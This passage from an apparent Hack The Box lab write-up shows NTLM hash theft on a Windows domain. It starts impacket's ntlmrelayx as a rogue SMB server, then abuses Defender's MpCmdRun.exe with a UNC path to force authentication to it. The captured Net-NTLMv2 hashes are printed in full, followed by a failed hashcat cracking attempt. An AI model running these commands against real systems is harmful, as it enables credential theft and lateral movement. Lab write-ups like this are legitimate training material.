NTLM Leak
Given that Lateral Movement to the martin.t user is made without knowing the password, several techniques can be used to retrieve the NTLM hash of the user.
The current system, ws-3.university.htb, is in an internal network (192.168.99.0/24). Therefore, it cannot reach Kali.
However, I remember seeing impacket package in the lab-2.university.htb host, which is also in the same internal network. I can use impacket-ntlmrelayx to mimic a SMB server.
root@LAB-2:~# ntlmrelayx.py -smb2support -ntlmchallenge 1122334455667788 -of ntlmrelayx
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Running in reflection mode
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connectionsStarting an arbitrary SMB server with impacket-ntlmrelayx
PS C:\Windows\system32> cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File \\192.168.99.12\blahblah
cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File \\192.168.99.12\blahblah
CmdTool: Failed with hr = 0x800106BA. Check C:\Users\Martin.T\AppData\Local\Temp\MpCmdRun.log for more informationUsing the binary, MpCmdRun.exe, I can attempt to scan an arbitrary file located in the arbitrary SMB server that I set up above. This will invoke the Defender to make an outbound connection to the arbitrary SMB server.
Relaying attack itself failed likely due to SMB message signing being enforced, but I still have the inbound connection string, which contains the credential hash
root@LAB-2:~# ll
total 24
drwx------ 3 root root 4096 Oct 31 23:23 ./
drwxr-xr-x 22 root root 4096 Sep 13 08:12 ../
lrwxrwxrwx 1 root root 9 Sep 14 03:48 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4096 Sep 13 11:11 .local/
-rw-r--r-- 1 root root 1800 Oct 31 23:23 ntlmrelayx_ntlmv2
-rw-r--r-- 1 root root 148 Aug 17 2015 .profilentlmrelayx_ntlmv2
root@LAB-2:~# cat ntlmrelayx_ntlmv2
Martin.T::UNIVERSITY:1122334455667788:9fb772857efc8c192d2a6b40d81a41c3:010100000000000080d094770d2cdb01c16e52a90663182000000000010016007300650072007600650072005f006e0061006d006500030016007300650072007600650072005f006e0061006d0065000200120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000700080080d094770d2cdb010600040002000000080030003000000000000000000000000020000038a225f841bac85bf5bd676789ecc12570bbef718703ba6cde95ad0729a88fdd0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00390039002e00310032000000000000000000
Martin.T::UNIVERSITY:1122334455667788:82d59d3b61a53ab5816372a60b8a2981:010100000000000080d094770d2cdb01110c0eba0a68c82100000000010016007300650072007600650072005f006e0061006d006500030016007300650072007600650072005f006e0061006d0065000200120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000700080080d094770d2cdb010600040002000000080030003000000000000000000000000020000038a225f841bac85bf5bd676789ecc12570bbef718703ba6cde95ad0729a88fdd0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00390039002e00310032000000000000000000
Martin.T::UNIVERSITY:1122334455667788:76aac59d3a150b9147b974e9b3242593:010100000000000080d094770d2cdb01b9e179748bbb930d00000000010016007300650072007600650072005f006e0061006d006500030016007300650072007600650072005f006e0061006d0065000200120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000700080080d094770d2cdb010600040002000000080030003000000000000000000000000020000038a225f841bac85bf5bd676789ecc12570bbef718703ba6cde95ad0729a88fdd0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00390039002e00310032000000000000000000Those are Net-NTLMv2 hashes
Password Cracking (Failed)
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ hashcat --show martin.t.hash
5600 | NetNTLMv2 | Network Protocol
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ hashcat -a 0 -m 5600 martin.t.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 3 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: martin.t.hash
Time.Started.....: Thu Oct 31 21:25:55 2024 (9 secs)
Time.Estimated...: Thu Oct 31 21:26:04 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 5241.8 kH/s (1.65ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 0/3 (0.00%) Digests (total), 0/3 (0.00%) Digests (new), 0/3 (0.00%) Salts
Progress.........: 43033155/43033155 (100.00%)
Rejected.........: 0/43033155 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:2 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[216361726f6c796e] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 66%
Started: Thu Oct 31 21:25:54 2024
Stopped: Thu Oct 31 21:26:05 2024hashcat was unable to crack the password hash